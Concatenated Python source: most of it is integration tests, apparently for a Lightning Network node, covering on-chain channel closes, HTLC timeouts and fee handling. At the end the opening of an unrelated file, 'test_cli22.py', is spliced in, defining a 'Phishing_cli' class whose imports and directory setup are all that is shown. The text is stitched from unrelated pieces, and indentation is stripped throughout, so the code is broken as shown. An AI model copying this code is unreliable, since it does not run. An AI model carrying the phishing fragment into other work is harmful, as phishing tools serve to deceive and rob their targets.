err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.isAlive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
addr = l1.bitcoin.rpc.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
|
test_cli22.py | import json
import multiprocessing
import os
from os import system, path
import re
from urllib.request import urlopen
from sys import stdout, argv, exit
from PyQt5 import QtCore
import time,subprocess as sp
from datetime import datetime
import ctypes
class Phishing_cli():
def __init__(self):
if "nt" in os.name:
self.dirk: str = str(sp.getoutput('powershell pwd'))
self.dirk: str = self.dirk.replace(" ", "").replace("\r", "").replace("\n", "").replace("'", "").replace("Path", "").replace("--", "")
if ("\\Phishing" not in self.dirk):
self.dirk += "\\Phishing"
